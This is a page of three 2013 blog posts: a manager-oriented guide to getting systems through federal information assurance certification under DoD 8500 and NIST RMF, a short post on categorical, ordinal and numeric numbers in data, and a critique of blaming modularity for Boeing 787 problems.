Wednesday, February 27, 2013

Federal IA certification of systems

by Eric Whyne
Also scheduled to be posted on Data Tactics Blog.

From the perspective of a software developer, federal software information assurance evaluation always seems to be an unnecessarily complicated topic. At first glance there seems to be a rigidity and lack of pragmatism or common sense to the process. I don't think that's really the case, but I refuse to add anything to the dialog that might confuse folks even more than they already are. In this post I identify the important parts and break things down into the elements that are common across the various frameworks and describe my approach to each. For the last few years there has been talk of mandating that more systems undergo IA evaluation, specifically those identified as "Critical Infrastructure". Maybe in the future it won't just be systems for the federal government having to undergo IA risk management.

I don't take the topic lightly; my career started in Information Assurance and for the past 8 years I've been involved with organizing a fairly large project that creates the Computer Security Handbook (currently in it's 5th edition). Like that book, this post approaches security certification/assessment from the perspective of a manager (aka project level decision maker) trying to get a project through the process. I wanted to plainly describe the important steps and put forth a pragmatic approach for how to achieve success and avoid common mistakes I've seen made.

When getting systems certified to deploy on Government networks we are essentially just doing risk management and mitigation. A common jest I hear from some engineers is that certification is just a bunch of paperwork. To be honest, that's mostly true. Risk management usually means paperwork. When I was a Marine Corps officer and we were doing Operational Risk Management (ORM) for live fire training exercises it was... paperwork. But it was useful paperwork that saved lives by making us think through the details of what could go wrong and how to prevent it. When approached correctly, security assessments can and do help us deploy safer systems. It's important to keep a positive attitude through the process and stay focused on those goals.

The risk management frameworks we work with in the federal space fall within the Department of Defense Directive 8500.x series or the NIST Risk Management Framework (RMF). NIST RMF is how DCID 6/3 and ICD 503 are implemented guided in the DoD by CNSS 1253 which is complimentary to SP-800-53 and specifically addresses national security systems. Although ICD 503 rescinded the mandate to use DCID 6/3, it continued to be used because there was never published guidance that could be used in place of it. ICD 503 is very broad and designed to be static, outlines basic goals but not how to achieve them. If this sounds confusing, it's because it is.
 
My advice is that if your organization is trying to figure out how to do this from scratch, focus on the NIST RMF approach (CNSS 1253, SP-500-3, whatever revision they are on). Most organizations claim to be transitioning to that. I'll use some DoDD 8500 examples in this post because the fundamentals really stay the same, which is what you need to be focused on. There are minor differences in vocabulary. For example DoD 8500 discusses Certification and Accreditation while NIST RMF uses the terms Assessment and Authorization. Don't get lost in the details of the semantics. Understand that much of what is written can be subject to very broad interpretation where the final decisions rest at the lowest levels (which is where I think they should be). The fundamentals are where you gain traction and are how you make security happen. Your job as the project manager and engineer is to make security happen and document how it was done to demonstrate the level of security to others.

Some advice: read each of the documents if you can find the time. People will always think you are brilliant even if you just spend an hour scanning each important manual. Smart people usually aren't really smarter than anybody, they just work harder and focus more. You'll gain an authority that will help you controls scope later on. It will also give you an awareness of the mindsets driving these processes. I haven't counted, but with some of the documents weighing in over 200 pages, the federal software security certification/assessment guidance probably rivals the complexity of US Tax laws. Because of this complexity and unavoidable contradictions, in any given meeting you'll find that people's understanding of the processes varies widely. When uncertainty creeps into conversations, folks tend to defer decisions to outside authorities. I heard a great term for this in a meeting a few weeks ago: "the gonculator". Unfortunately, there is no magical outside authority that will make the detailed security decisions for you. Take ownership. Understand that cowardice is just as fatal to your project as imprudent courage. With that said, caution and humility regardless of how well you think you understand things is always advised. I've seen engineering managers become frustrated because they have been unable to plan for the various activities required by accreditation. This can cause tension between the IA team and the engineers. Those situations are created by conflicting goals and vocabularies. The two domains are often unable to speak to the goals of the other party in their conceptual frameworks and folks get rightfully frustrated. Here are the basics to help you be more prepared for those dialogues and have some more understanding and courage to ensure the right actions are taken and the best decisions are reached.

In my opinion, as an engineer or an engineering project manager you only really need to have a detailed understanding of the contents of two of the  guiding documents, depending on if you have to do 8500 or NIST RMF. These documents lay out the generic security controls that your system will need to meet. There will be various decisions along the way that determine exactly which generic controls need to be met, but if you don't want to be caught with a nasty surprise you should have a good idea of what the controls are and have a good feeling for the intent of each of them.

For NIST RMF, the generic controls are documented in SP 800-53 "Recommended Security Controls for Federal Information Systems and Organizations".

For 8500, the generic controls are documented in DoDD 8500.2 "Information Assurance (IA) Implementation".

Don't memorize them because, unfortunately, you won't be contending directly with these controls deploying systems. What you'll be contending with is your Information Assurance staff's interpretation of them and those interpretations will vary. For an engineering staff going through the processes of any of these frameworks, the fundamental approaches are going to be the same. There is an evaluation and mitigation of risk which results in a decision to let the system deploy (or not). You will need to undertake five unique, separate, and fundamental engineering activities. These are my "activities" derived from my experience. Think of them as a conceptual framework to put the actual activities of whatever process your dealing with in context. Different processes implement these fundamental approaches in different ways.

1. Implement generic "good idea" guidance. This is where all the process paperwork happens, but some of the guidance is very technical. In 8500 these generic good ideas are called "IA Controls". In NIST RMF these are called simply "Security Controls". They are documented in the two documents that I think you should become familiar with above (SP-800-53 and DoDD 8500.2). This is how you integrate security during the planning stages of development. Having a deliberate planning activity that goes through each technical security control in order of severity and applies it to your design during development will make your system fantastically more secure. At that point, writing ideas about how to verify those controls in the end system pretty much knocks out your test plan. Understand that not doing this stuff early means you'll be incurring technical debt that will have to be paid before you can deploy your system and it only gets more difficult as time goes on.

2. Find out which documented vulnerabilities affect your system, prioritize and fix them. The universal system for referencing vulnerabilities is Common Vulnerabilities and Exposures (CVE) identifiers.

3. Find out which specific secure configuration guidance applies to the specific software in your system and then implement it. In 8500 these are called Secure Technical Implementation Guidlines (STIGs). NIST RMF has taken the software specific implementation guidelines and created an XML dissemination format which automates them; it's called Security Content Automation Procotol (SCAP).

4. Conduct automated vulnerability scanning and evaluate the results. Document the occurrence of false positives (say why they are false) and prioritize and fix any vulnerabilities found.

5. Whatever you can't fix right now, you need to come up with a plan for the future that describes how it will be mitigated or fixed in the future. In 8500 this is called a Plan of Action and Milestones (POA&M).

In most risk management frameworks (thinking Project Management Institute (PMI) approach here), the first step is to identify risks and write them down in a spreadsheet called a risk register. Then you assign two subjective numbers, one of which is how probable you think the risk is and the other being how bad would the effects of the risk happening be. Then you prioritize, conduct risk mitigation (i.e. take action to lower either the probability or affects) on the worst of them, and periodically start that process over (aka monitor risks). This is very productive and it's plain to see how it can help. It certainly helped me avoid Marines getting injured or killed in training accidents, so I'm a believer.

Unfortunately computers and software systems are very complex. The risk are complex and, to be completely honest, nobody has a real clue about how probable the risks are. To combat this complexity the 8500.x accreditation and NIST RMF start off by requiring a determination how much availability, integrity, and risk acceptance the system needs or can have. This assessment is mostly used to decide which generic guidance needs to apply to your system.

Once your system has this classifier associated with it, the process really begins for real. (Important note: Only systems in the context of their deployed environment are accredited not individual software packages.) So let's say your doing DoD 8500 and your system is determined to be MAC II Classified. That's a common determination. That designation will determine what Information Assurance (IA) Controls you are required to implement on the system.   The IA controls are generic guidance about how to configure the system. You'll find the details about IA Controls in DoD 8500.2 in the Enclosures. Specifically Enclosure 2 talks about Mission Assurance Categories and Confidentiality levels then Enclosure 4 describes the IA Controls for each resultant category of system. As soon as possible you need to have the IA staff provide you a list of IA controls you'll have to implement on your system. Have them provide it to you and get them to agree that this is the correct list. Hold a meeting, preferably in person, to review each one. In an 8500 there are usually around 70 specific controls you need to meet. You show that you have met them by taking the required action and writing down what was done or how the system meets the requirement.

Here are IA Control examples and a short discussion of potential pitfalls:

IA Control DCAR-1

"An annual IA review is conducted that comprehensively evaluates existing policies and processes to ensure procedural consistency and to ensure that they fully support the goal of uninterrupted operations."

The four letters DCAR have a special meaning, we don't need to memorize it, so we can just treat it as a categorical identifier (see my post on numbers in data). What this IA Control is saying is that you need to have an annual review. Sounds easy. Where this can go south is when the IA staff wants to kick off right into the first annual review and make generation of each of the procedural documents a requirement for meeting completion of this control. Controlling scope is an important part of getting through the process successfully. If possible, you should push those into the "plan for the future" phase so you can have time to do them correctly. If you end up not being able to control scope here, the worst case scenario is that you burn a few weeks of your schedule in process documentation. But if  you have to do that, do it smartly. Use the time to pay off that technical debt your project has probably been accruing. Cover your bases on the other process focused IA controls. Divide and conquer, make sure your engineering team is working the controls controls specific to technical implementation while you wrestle with the process ones. 

As for other Process focused IA Controls, they might require you to write things like a System Security Plan (SSP) or other security documentation artifacts. Just go with what your IA staff needs or wants because this varies widely from organization to organization. Some organizations are easy and pragmatic about this, some are unnecessarily hard (in my opinion). It has to do with the overall technical competence of the organization and how risk tolerant they are. While you're doing this, plan ahead. When you add new software to the system in the future it will be facilitated by the processes you lay out here. There are tricks to writing good processes that make that easy, but that's left for another blog post.

DCMC-1 Mobile Code
I'm not going to paste in the text for this one here, but it basically says that "mobile code" needs to be signed by a certificate. Yes, JavaScript is mobile code. Before you start panicking about having to cryptographically sign every piece of dynamically generated web app JavaScript in your system, take a deep breath and relax. JavaScript when executed in a browser is exempt from this requirement. Here's the guidance from NIST that you can cite "Within a browser context, JavaScript does not have methods for directly accessing a client file system or for directly opening connections to other computers besides the host that provided the content source. Moreover, the browser normally confines a script’s execution to the page in which it was downloaded." There are DoD documents that say the same thing, your IA staff should know this (but some don't). Still, watch out for things like cross-site scripting vulnerabilities when deploying JavaScript/HTML5 interfaces. If you don't know what those are, you need to study them. Basically if at any time a user can generate JavaScript that will be shown on another user's screen, you're vulnerable.

DCPA-1 Partitioning the Application
"User interface services (e.g., web services) are physically or logically separated from data storage and management services (e.g., database management systems). Separation may be accomplished through the use of different computers, different CPUs, different instances of the operating system, different network addresses, combinations of these methods, or other methods as appropriate."

DCPA-1 is probably my favorite IA Control. I like straight forward and useful technical guidance. Watch out though, because controls like this can cause some major re-factoring of your system if it wasn't built properly. If you tried reducing the number of operating system licenses for your system by cramming stuff together, you might be running into problems here. Next thing you know you're not only changing your budget (buying extra licenses) but your schedule is off as you rebuild the systems to implement the required partitioning of the application. On a related database note: please use prepared SQL statements if you're using a database in your application. If you let users control an unfiltered text variable that gets placed into an SQL statement you might as well be giving them the keys to the database. This is database security 101, but it still happens. Finding mistakes like this is one of the real values of code reviews.

Once you get a good handle on the IA Controls/Security Controls you've been handed, breathe easy. The rest of the process is focused on the specific technologies of your system and is more straight forward. At some point you'll be asked to provide a list of the software on the system and each of the version numbers. What the IA staff wants to do is check two databases for the software.  One is the National Vulnerability Database (NVD), the other is the DISA Secure Technical Implementation Guidelines (STIGs) site or the Security Content Automation Protocol (SCAP) site. Here is the site for the National Checklist Program.

When they look your software up in the NVD you should get back a list of Common Vulnerabilities and Exposures (CVE) identifiers. Just as with the IA Controls make sure they provide you with this list and that everyone agrees on it. CVEs are just publicly known vulnerabilities in the software. The reason the IA staff will get this list is because they will prioritize each vulnerability by assigning it a Category. These range from Cat 1 which is "results in total loss or provides immediate access" to Cat IV which is something like "results in degraded security". You need to come to an agreement about which vulnerabilities need to be addressed before the system goes live. The determination should take into account attack surface and severity. Make sure you know what needs to be addressed. Once everyone is in agreement, have the engineering team start closing the holes and writing down what they do. Since these are all technical undertakings, my approach has been to paste all the CVEs that need to be answered in a wiki. Again, divide and conquer. Set folks to work in accordance with their capabilities and have everyone paste their results and remediation notes into the wiki next to their CVEs. Upon completion, export to a document and you're done. Keep the wiki up and keep building on it as new vulnerabilities come out.

A note on patching vulnerabilities. It's a necessary practice to check if the vulnerability has already been fixed on your system before attempting to patch it! They usually are. This is especially true on Linux systems. CVEs identify software by Version Number, but on modern software systems lots of folks have good reason to use older versions of software. For example older versions tend to be more stable. This means that security patches are almost always back-ported to older versions of software. In order to determine if the software you are using has been patched, look at the release notes. You'll typically find the CVE numbers mentioned in there. On RedHat and Centos you can do this by using the command "rpm -q --changelog <package name>". I never feel bad paying for Linux support licenses because it allows companies like Canonical and Redhat to stay up on this stuff. They are the ones doing all the hard work back-porting security patches. Here is Ubuntu's page on the matter.

STIGs are addressed much like CVEs. Have them provide you the list and assign categories to each then work together to determine prioritization. As the name implies Secure Technical Implementation Guidelines deal with how the software is configured. When your engineering team starts working on the STIGs, have them document what was done to implement the requirement or reduce the attack surface. If you're doing NIST RMF, you'll get the SCAP XML file and tools which should automate things a bit. Stuff will break. That's to be expected, just make sure you interact with the engineers enough to understand what's going on and how the schedule will change. Stuff like this has a potential to create project drag and shift schedules, so keep a handle on it and keep stakeholders updated.

Aside from some general IA Controls/Security Controls, up to this point we've mostly just addressed how to secure software that is popular enough to have made it into the STIG guidance, SCAP, or NVD. Astute technologists will note that there's a good chunk of custom developed code or obscure software that needs to be addressed more closely. You're right. The last technical hurdle is system scans. Typically this will be done by deploying the software to a test environment or conducting non-destructive scanning on the soon-to-be-production system. It always seems like you get an extremely long list of false positive results from any scanning software. I'm not a fan of having to deal with those. If you've ever attended an IA meeting, this is where the huge numbers of "vulnerabilities" might be thrown about. (See my blog post about Automated Vulnerability Scanning to read my advice if you're stuck managing the conduct of scans.) Don't let the IA team throw that list "over the wall" at you and ask you to to put a schedule on it's completion. If they don't acknowledge that at least some of the results are false positives from the start, you're going to have a hard time getting anywhere. Demand a meeting to review the scan results with the IA folks that did the scan and invite key members of the engineering staff. Categorize the results and get some idea of how to prioritize addressing them. Often, whole chunks of results can be easily identified as being false positives in this meeting and can be dismissed immediately. Add a column to the spreadsheet listing the findings and just flag each of them as false positives. Then evaluate the rest that you're unsure of to the satisfaction of the IA staff. Don't waste time. Keep going for the kill and keep closing out items. Above all, don't throw the list of thousands of items "over the wall" to your engineering staff and ask them to come up with a schedule. Take ownership initially and once the list of uncertainties is manageable then start delegating detailed exploration and fixes. Document via the wiki strategy we described previously.

As we've gone through the various hurdles, there was probably a list of items that aren't able to be completed prior to the release of the software. They might be a lower risk category or be just too difficult to fix in a reasonable amount of time. It doesn't mean you need to push back your release schedule. What happens with those items is a planning exercise. I saved mentioning this for last because it should be done late in the process after other options have been explored and the engineering staff has a good grasp of the implications of addressing the open items. Create a Plan of Action and Milestones (POA&M) document which lists each of the open issues, summarizes the risks, and identifies the actions that will be taken to close the issues. 

If you've gotten this far, the last step is to compile all of these artifacts (which should effectively be a list of the actions everybody took to secure the system!) and put them all together in a single package for review. Done effectively this compilation of results provides a realistic estimate of the security of the system and can be used to grant it an authority to operate on the "enclave" that we are trying to introduce it to. Done poorly, the package is a soupy-mash of obscure and useless information that doesn't drive a decision. If at all possible, dive into helping with the creation of this package. At the very least, demand to see it prior to it being shown to the decision maker. Often the person making the decision is so senior that they haven't been involved in the assessment and security process up until this point. Make sure that your system makes a good first impression. If the package reflects poorly on the system, immediately address the issues and push back the decision. Don't let it go forward and just hope for a good result. Authorization to operate is ephemeral and come in various flavors which designate just how temporary they are. An Interim Authority To Test (IATT) can be valid for just a few weeks or months. A full blown Authority To Operate (ATO) can be valid for much longer before the system must be reassessed.

My hope is that this guidance has assisted somewhat in providing some clarity on the process. Guidance periodically changes, but the five fundamental activities I've laid out here are common sense and common across the various frameworks of the past. Security means way more than just checking vulnerabilities and patching them. It requires addressing the system as a whole and being diligent about all five aspects of this process. Keep a working awareness of the generic "good idea" documents I've described above and make the knowledge in them part of your engineering culture. You'll write more secure software and alleviate some of the engineering anxiety when approaching certification time.



















Sunday, February 10, 2013

Categories of numbers from data


I think some programmers approach numbers in the wrong way when solving data problems. 

Wikipedia hosts a comprehensive list of types of numbers. They are all important, although when implementing code we rarely get to think in these terms. Numbers and their relationship to computers is a shorter list. This is where most programmers spend the majority of their time thinking and working. Here are the big three:
  • Integers
  • Floats
  • Bignum or Arbitrary precision
The distinction of each is in how these numbers are treated in the memory of the computer. Different languages have different implementations. Know that integers and floats have fixed sizes and using a bignum is less efficient. If you put too big of a number in fixed size memory it will be concatenated or run over into adjacent memory and cause problems. Dealing with bignum or arbitrary precision numbers will slow down how fast your program runs.

I have an affinity for untyped and weakly typed programming languages because it allows me to spend more time in a different frame of mind. If you're not familiar with the terms: it doesn't mean that they are spoken word or that you hit the keys lighter, it has to do with how variables are declared. In an untyped language you just mostly just put data in the variables you create and the compiler figures out most of the details about whether to treat the data as a string, an integer, a float, or whatever. It makes writing code more enjoyable since only in a small set of circumstances do I ever really care about how that stuff is handled any way. Most untyped languages have ways of telling the computer specifically what to do when it matters.

This post is about that different frame of mind. I wanted to discuss a way of thinking about numbers that I rarely see addressed in literature or discussion that I think is important. It deals with how we need to think about these numbers when they appear in data. In my mind, numbers from data fall into these three categories.
  • ordinal
  • numeric (including cardinal)
  • nominal (aka categorical)
Statisticians care deeply about these categories. Some of my friends guffaw at how common sense dealing with numbers in this manner is; and they are right. You'll find them prominently listed in statistics literature, but not so much in computer science or programming books. I think they are important to computer science but their significance is largely ignored. As we approach data problems with computers, this categorization becomes more important.

A brief description of each:

Ordinal numbers, although they might not appear or be sorted into an order in the data, can be put into a sorted order. What's missing from ordinal numbers is the relative size or degree of the difference. They are most commonly represented by integers, but don't let that fool you.  They can be represented by other things as well even in some cases letters. An example of an ordinal number would be the ranking of winners in a race. By looking at first and second place we know who is faster, but just going off of those numbers we can't tell how much faster.

Numeric numbers are similar to ordinal numbers, but give clues about relative differences. If we arranged a set of objects by weight their position would be ordinal and the weight would be numeric.

Categorical numbers simply serve as a unique identifier or an identifier of some category. A common example of these types of numbers is a part number or serial number on a piece of equipment. You can really get away with treating these as text in most circumstances. In real world data, people have a habit of sneaking in other characters when you don't expect them anyway (like dashes). Real world categorical numbers also tend to be multi-layered. A great example of this is phone numbers. The first three digits give information about a geographic region. If it's a cellular number from the United States, it was probably the geographic region the subscriber was at in 2005. I like that when phone numbers appear whole in a normalized relational database it creates a micro-instance of a denormalized data structure (don't tell your 1970 to late 1990s relational database professor, this was a sin back then). It doesn't really matter because of the context they usually appear in, but I always enjoyed that little nuance. In a future post I might discuss denormalized vs normalized structures and when they are both useful. It's probably one of the biggest decisions we make when designing an approach to a data problem.

I think approaching data problems by looking at numbers with these attributes in mind first is more productive than thinking about whether or not things will fit in memory. Too often I've seen consternation and wasted time as people try to force categorical numbers into a mechanism designed for integers. There's no need. Thinking about numbers in terms of ordinal, numeric, and categorical properties make those warehousing and analysis questions easier.










Friday, February 1, 2013

Modular vs Integrated wrt Boeing 787 project



A colleague forwarded this article. I think the conclusion it reaches is wrong.
http://blogs.hbr.org/cs/2013/01/the_787s_problems_run_deeper_t.html

First, I have no opinion on the 787 project and have no problem with Boeing's approach. The article attempts to frame the supposed cost and schedule problems of the Boeing 787 project on premature modularization.  Maybe that's a problem when building airplanes or power plants (I have never designed either so I'll suspend my disbelief).  However, I strongly disagree with regard to software.  Granted, software is different than most engineering undertakings.  But I think we can reason through some useful engineering considerations from within that context. 

There are two primary reasons to integrate early in software projects: decreased development time or increased optimization (aka decreased run time).  Sure, faster development and faster software are both good things.  But there are trade-offs to attaining each.

Decreased time: The software term for early and overly-tight integration to reduce development time is a “hack” or “prototype”.  This can be fine in some cases but usually means that the solution is myopic and there is an increased cost to applying it to other use cases or problems.  When writing software, which is mostly tools for others to use during the undertaking of their professions, we want it to be as widely applicable as possible (while still being effective for the original intended purpose). The cost of modifying the software or deploying it in situations outside the scope of the original prototype is made more difficult as during prototype hacking middle components are left out and back end components are often built in a manner that doesn't scale well. Modularization reduces the cost of changing these components to meet new use cases.

Increased optimization: Alternately if integration is explored as an optimization can also be problematic as it increases the cost of change.  Tightly integrated code is more difficult to troubleshoot and debug.  Don Knuth famously noted this when he said “Premature optimization is the root of all evil (or at least most of it) in programming”.  Changing requirements are also a common occurrence in software projects. Optimizing prematurely means that you may be required to untangle a web of dependencies before making changes. You literally "outsmart yourself" when that clever trick to reduce runtime has to be laboriously undone because the tables have turned on where execution time matters. Modularity assists in addressing shifting requirements by reducing the cost of change.

As an example, separation of concerns is a core tenant of how we bounce data around the Internet. The protocol that handles routing (IPv4) of information isn't the same protocol that handles error correction (TCP). Some use cases don't need perfect transmission of each bit of data, e.g. Voice over IP (VoIP), so when those came along TCP was replaced with UDP for that use case. If you miss a few bytes of audio while someone is speaking it doesn't matter if those bytes catch up a few seconds later. Our human brains happen to be very good at filling in the small gaps in audio, especially human speech. To look at the reverse of that autonomy, because of the growth of the Internet it looks like we'll run out of IPv4 address space soon. Updating to IPv6 doesn't break the underlying protocols (TCP, UDP, VoIP). This is all possible because the stack is designed with modularity.

Let's think of another popular and current example: SOLR, Lucene, and Tika. This is a great stack of software, when put together provides one of the best enterprise search capabilities available (and it's open source). SOLR indexes text. Tika transforms various documents into text. Had these complimentary functionalities been tightly integrated into the same software it might have decreased development time or run time, but the added complexity and dependencies would also mean that the use cases would be far more limited than they currently are. Plenty of projects use SOLR and Tika to do unique and interesting things as part of other systems. The modular approach to development of these projects enabled that.

Modularity allows components of a system to evolve independently.  Tika can continue to parse new file types and SOLR can continue to do neat stuff with indexes and thanks to their modular approaches they can both evolve independently. If I have a specific set of file types Tika developers will never see and I can't share with the developers, I can write my own parser and output to something SOLR can read.  Since software advances so quickly, this becomes more important than other professions.  Integration increases the cost of change to any single functionality or concern. Unintended side-effects of advancements cascade through the software. Understanding interfaces is a necessity and the work required to think through modularization is useful in catching unanticipated problems early and creating maintainable/usable software.

In the case of air planes “flying x people y miles” seems to me to imply a very static use case so tight integration might be good.  Certainly in the case of Apple’s product lines tight integration has served them well due to their ability to maintain a homogeneous software and hardware environment.  But I’d even argue that to some degree.  Even though Apple products appear to be tightly integrated the hardware manufacturers have famously made last minute changes that were facilitated by modularity of the hardware components.  Anyone that has ever disassembled an iphone has probably been as amazed as I was to see how modular the components are.  So the author’s argument using his experience at Apple as a precedent falls apart under scrutiny.   

 I doubt modularity caused the failure of the 787 effort.  Perhaps they were implementing modularity at the wrong level or in the wrong way.  Perhaps the actual causes of the failure wasn’t related to integration vs modularity at all. “asked suppliers to create their own blueprints for parts” seems like a pretty big red flag in my mind, wrought with all sorts of chances to mess up simple things like English to Metric conversions or variances in design software nuances causing problems.  “Lawyers will probably get involved” is another red flag.  Writing business sub-contracts which don’t account for known-unknowns seems like very poor decision making.  The author seems to be stretching in the assertions he is able to make about building things if he is blaming this failure on modularity.  (That’s my polite way of saying that I think he missed the mark entirely.)